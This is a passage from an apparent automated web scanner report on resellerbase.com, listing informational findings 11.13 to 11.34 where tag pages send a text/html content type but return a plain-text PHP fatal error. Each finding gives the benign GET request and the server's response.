<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.13. http://www.resellerbase.com/tag/SEO+outsourcing

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/SEO+outsourcing

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/SEO+outsourcing HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.14. http://www.resellerbase.com/tag/SEO+reseller+program

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/SEO+reseller+program

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/SEO+reseller+program HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.15. http://www.resellerbase.com/tag/White+Label+SEO

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/White+Label+SEO

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/White+Label+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.16. http://www.resellerbase.com/tag/downtime+monitor

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/downtime+monitor

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/downtime+monitor HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.17. http://www.resellerbase.com/tag/dripship

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/dripship

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/dripship HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.18. http://www.resellerbase.com/tag/dropshipping

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/dropshipping

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/dropshipping HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.19. http://www.resellerbase.com/tag/email+fax

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/email+fax

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/email+fax HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.20. http://www.resellerbase.com/tag/nude

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/nude

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/nude HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.21. http://www.resellerbase.com/tag/outsource

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/outsource

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/outsource HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.22. http://www.resellerbase.com/tag/reseller

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/reseller

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/reseller HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.23. http://www.resellerbase.com/tag/search+engine+optimisation

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/search+engine+optimisation

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/search+engine+optimisation HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.24. http://www.resellerbase.com/tag/search+engine+optimization

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/search+engine+optimization

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/search+engine+optimization HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.25. http://www.resellerbase.com/tag/search+engine+submission

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/search+engine+submission

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/search+engine+submission HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.26. http://www.resellerbase.com/tag/seo

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/seo

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/seo HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.27. http://www.resellerbase.com/tag/ssl+certificates

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/ssl+certificates

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/ssl+certificates HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.28. http://www.resellerbase.com/tag/survey

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/survey

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/survey HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.29. http://www.resellerbase.com/tag/uptime+monitoring

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/uptime+monitoring

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/uptime+monitoring HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.30. http://www.resellerbase.com/tag/web+cam+chat

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/web+cam+chat

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/web+cam+chat HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.31. http://www.resellerbase.com/tag/web+statistics

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/web+statistics

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/web+statistics HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.32. http://www.resellerbase.com/tag/webhosting

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/webhosting

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/webhosting HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.33. http://www.resellerbase.com/tag/website+monitoring

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /tag/website+monitoring

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/website+monitoring HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />

11.34. http://www.resellerbase.com/web-service/more2.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/more2.html

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /web-service/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:49:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Content-Length: 185
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function Fields() on a non-object in <b>/home/resellerbase/domains/resellerbase.com/public_html/lib/db.class.php</b> on line <b>0</b><br />
